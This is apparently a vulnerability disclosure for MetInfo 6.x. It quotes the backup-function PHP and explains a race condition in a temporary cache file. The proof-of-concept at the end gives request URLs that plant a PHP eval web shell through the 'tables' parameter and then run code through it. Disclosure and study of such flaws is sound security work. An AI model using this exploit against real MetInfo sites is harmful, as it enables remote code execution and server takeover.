The MetInfo 6.x background getshell
Description: An issue was discovered in Metinfo 6.x.An attacker can use backend database backup function to get the web shell.
1.Technical Description:
locate in /app/system/databack/admin/index.class.php line:456 to 478:
public function dogetsql($table='') {
global $_M;
if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
$localurl=$_M['config']['met_weburl'];
$tablepre=$_M['config']['tablepre'];
$fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
if($table){
$tables=$table;
}else{
$tables=$this->dotableprearray($tablepre);
}
$sizelimit=2048;
if($fileid==1){
$random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
$this->docache_write('bakup_tables.php', $tables);
}elseif(!$tbl){
$random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
$allidlist=explode('|',$tablestx);
for($i=0;$i<count($allidlist)-1;$i++){
$tables[$i]=$allidlist[$i];
}
}
If we post a string type '$tables',the program will execute docache_write locate in line 334 to 351:
function docache_write($file, $string, $type = 'array'){
global $_M;
if(is_array($string))
{
$type = strtolower($type);
if($type == 'array')
{
$string = "<?php\n return ".var_export($string,TRUE).";\n?>";
}
elseif($type == 'constant')
{
$data='';
foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
$string = "<?php\n".$data."\n?>";
}
}
file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
}
It will create a file named 'bakup_tables.php' locate in /admin/databack/,and we can control the content. But in the end of the function dogetsql,the program will delete the tmpfile 'bakup_tables.php'.
$this->docache_delete('bakup_tables.php', $tables);
So we need to use Race condition to get the code is executed
2.PoC
Use the Google Chrome open this test site.download the latest version( https://www.mituo.cn/upload/file/MetInfo6.1.3.zip)and build a test site.
After the administrator logged in.
We use this url:
http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1
At the same time.We use Race condition.
http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');

